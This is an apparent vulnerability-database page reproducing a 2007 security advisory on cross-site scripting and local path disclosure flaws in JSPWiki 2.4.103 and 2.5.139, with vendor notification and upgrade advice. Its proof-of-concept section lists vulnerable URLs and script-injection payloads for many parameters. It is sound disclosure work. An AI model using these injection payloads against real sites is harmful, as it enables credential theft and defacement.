Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

jspwiki-xss.txt

🗓️ 26 Sep 2007 00:00:00Reported by Jason KratzerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

JSPWiki Multiple Vulnerabilities version 2.4.103 and 2.5.139. Cross Site Scripting and Local Path Disclosure discovered, affecting user credentials, posts falsification, and site defacement

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Application: JSPWiki Multiple Vulnerabilities  
Version: 2.4.103 and 2.5.139  
Credit: Jason Kratzer  
Date: 9/24/2007  
  
  
Background  
------------------------------------------------------------  
JSPWiki is wiki software built around the standard J2EE components of  
Java, servlets and JSP. It was written by Janne Jalkanen and released  
under the LGPL. The Sun Java System Portal Server includes it as one  
of its core applications. It is primarily used for company intranets  
and has an active developer community, also including the i3G  
Institute of the Heilbronn University.  
  
(Courtesy of Wikipedia: http://en.wikipedia.org/wiki/JSPWiki)  
  
  
  
Description  
------------------------------------------------------------  
Multiple Cross Site Scripting vulnerabilities have been discovered  
within the JSPWiki application, successfully allowing an attacker to  
steal credentials, falsify posts, and persistently deface portions of  
the site. Additionally, a Local Path Disclosure vulnerability was  
also discovered.  
  
  
  
Affected Versions  
------------------------------------------------------------  
Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-beta.  
The Cross Site Scripting vulnerability affecting the redirect  
parameter is only found in version 2.5.139-beta.  
  
  
  
Proof of Concept  
  
Cross Site Scripting Vulnerabilities:  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test  
  
Vulnerable Parameters:  
group=Test"<script>alert("Test+XSS")</script>  
members= Test"<script>alert("Test+XSS")</script>  
  
Type: Reflective  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save  
  
Vulnerable Parameters:  
edittime=<script>alert("Test+XSS")</script>  
  
Type: Reflective  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386737&addr=127.0.0.1&_editedtext=Test&author=AnonymousCoward&link=&ok=Save  
  
Vulnerable Parameters:  
edittime=<script>alert("Test+XSS")</script>  
author=<script>alert("Test+XSS")</script>  
link="><SCRIPT>alert("Test+XSS")</SCRIPT>  
  
Type: Reflective  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/UserPreferences.jsp?tab=profile&loginname=Test&password=Test&password2=Test&wikiname=Test&fullname=Test&[email protected]&ok=Save+profile&action=saveProfile  
http://vulnerable-site.com/wiki/Login.jsp?tab=profile&loginname=Test&password=Test&password2=Test&wikiname=Test&fullname=Test&[email protected]&ok=Save+profile&action=saveProfile  
  
Vulnerable Parameters:  
loginname="><script>alert("Test+XSS")</script>  
wikiname="><script>alert("Test+XSS")</script>  
fullname="><script>alert("Test+XSS")</script>  
email="><script>alert("Test+XSS")</script>  
  
Type: Reflective  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/Diff.jsp?page=Administrator&r1=-1&r2=1  
  
Vulnerable Parameters:  
r1=<script>alert('Test XSS")</script>  
r2=<script>alert("Test+XSS")</script>  
  
Type: Reflective  
------------------------------------------------------------  
http://vulnerable-site.com/wiki/PageInfo.jsp?page=SystemInfo/test.jpg  
  
Vulnerable Parameters:  
changenote=<script>alert("Test+XSS")</script>  
  
Type: Stored  
------------------------------------------------------------  
http://vulnerable-site.com/wiki-3/Login.jsp?redirect=Main  
  
Vulnerable Parameter:  
redirect="><script>alert("Test+XSS")</script>  
  
Notes:  
The redirect parameter is found in multiple places through  
JSPWiki-2.5.139-beta and is vulnerable in every instance.  
  
------------------------------------------------------------  
  
Local Path Disclosure:  
  
http://vulnerable-site.com/wiki/attach/Main/Insert-Uploaded-Attachment-Filename-Here?version=1000000  
(Nonexistent #)  
  
Vulnerable Parameter;  
Version=10000000  
  
Notes:  
The non-existent number must be between 1 and 10 character  
otherwise a standard 500 error will be displayed.  
  
  
  
Vendor Notification  
------------------------------------------------------------  
The JSPWiki project was notified on September 10, 2007. Janne  
Jalkanen developed and implemented a fix by September 18, 2007.  
  
  
  
Remediation  
------------------------------------------------------------  
It is recommended to upgrade to JSPWiki version 2.4.104. It is also  
worth noting, the above vulnerabilities have also been fixed in the  
beta release, version 2.5.139.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4
jspwiki multiple vulnerabilitiescross site scriptinglocal path disclosureuser credentialsposts falsificationsite defacementjavaservletsjsplgplintranetsj2ee componentsvulnerable versionsproof of concept
19
.json
Report